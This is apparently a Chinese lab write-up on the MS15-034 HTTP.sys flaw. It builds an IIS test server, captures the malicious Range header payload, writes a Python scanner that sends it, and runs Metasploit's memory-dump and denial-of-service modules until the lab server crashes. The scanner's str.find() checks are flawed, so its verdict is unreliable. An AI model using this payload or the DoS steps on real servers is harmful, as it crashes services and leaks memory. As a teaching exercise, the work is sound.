ms15-034的的漏洞利用，及使用爬虫编写扫描器

ms15-034一个高危漏洞
根据微软官方公告来看，受影响的系统还是挺多的，那么本次就记录这个漏洞的学习过程吧

  从官方的公告可以得知产生原因 
  远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，
  当 HTTP.sys未正确分析经特殊设计的 HTTP 请求时会导致
  此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

也就说明通过特殊构造的poc就可以触发漏洞

使用windows server2008R2 搭建本次学习需要的环境

•  打开服务器管理器，添加角色
  

•  选择web服务器
  

•  这里可以看一下介绍是用来干嘛的，然后下一步
  

•  这里勾选http重定向，以及管理工具所有的选项，下一步
  

•  确认功能无误，开始安装
  

•   安装成功之后关闭，使用另一台win7虚拟机访问该服务器的地址
  

搭建完成后打开msf 检测一下漏洞是否存在，run的时候在后台打开wireshare抓包

 > search  ms15-034

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  auxiliary/dos/http/ms15_034_ulonglongadd                               normal  Yes    MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
   1  auxiliary/scanner/http/ms15_034_http_sys_memory_dump                   normal  Yes    MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure


msf5 > use 1
msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > show options 

Module options (auxiliary/scanner/http/ms15_034_http_sys_memory_dump):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   SUPPRESS_REQUEST  true             yes       Suppress output of the requested resource
   TARGETURI         /                no        URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
   THREADS           1                yes       The number of concurrent threads (max one per host)
   VHOST                              no        HTTP server virtual host

msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set rhosts 192.168.3.51
rhosts => 192.168.3.51
msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > run

[+] Target may be vulnerable...
[+] Stand by...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

一执行，马上就显示出来目标好像存在漏洞，打开wireshare，筛选栏
http and ip.dst eq 192.168.3.51

  可以看到msf发送了一个自己构造的http请求，其中自定义了一个非法的头部信息
  追踪http流拿到payload Range:bytes=0-18446744073709551615

  开始编写自己的扫描器。
  具体思路为用python requests库来提交自己构造的http访问

import requests                                                                                                                                              
                                                                                                                                                             
import sys                                                                                                                                                   
                                                                                                                                                             
url = "http://"+sys.argv[1]                                                                                                                                  
                                                                                                                                                             
r = requests.get(url)                                                                                                                                        
                                                                                                                                                             
remote_server = r.headers['Server']                                                                                                                          
                                                                                                                                                             
if remote_server.find("IIS/7.5") or remote_server.find("IIS/8.0"):                                                                                           
                                                                                                                                                             
    payload = {"Host":"stuff","Range":"bytes=0-18446744073709551615"}
   
    r1 = requests.get(url,headers=payload)
    
    print (r1.request.headers)			#输出自定义的头部信息
    
    if str(r1.content).find("Requested Range Not Satisfiable"):
        
        print  (url + '--' + "vnlu is exist" )

    else:
        
        print ("ms05-034 is not exist")
else:
    
    print (url + '--' + "server not a  iis/7.5 or iis/8.0 ")

运行效果

aaa@qq.com:~/python/test# python3 ms15_034.py 192.168.3.51
{'User-Agent': 'python-requests/2.22.0', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Host': 'stuff', 'Range': 'bytes=0-18446744073709551615'}
http://192.168.3.51--vnlu is exist
aaa@qq.com:~/python/test# 

漏洞存在的话就可以利用一下，记得不错的话好像msf有这个模块的

msf5 > search ms15-034			#搜索ms15-034相关模块

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  auxiliary/dos/http/ms15_034_ulonglongadd                               normal  Yes    MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
   1  auxiliary/scanner/http/ms15_034_http_sys_memory_dump                   normal  Yes    MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure


msf5 > use 0					#选择搜索出来的第一个利用模块
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > show options		#查看需要设置的参数

Module options (auxiliary/dos/http/ms15_034_ulonglongadd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                no        URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.3.51		#设置目标
rhosts => 192.168.3.51
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > run

[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

这刚摁下去就直接凉凉了

声明：本文仅供学习，请勿用作非法用途。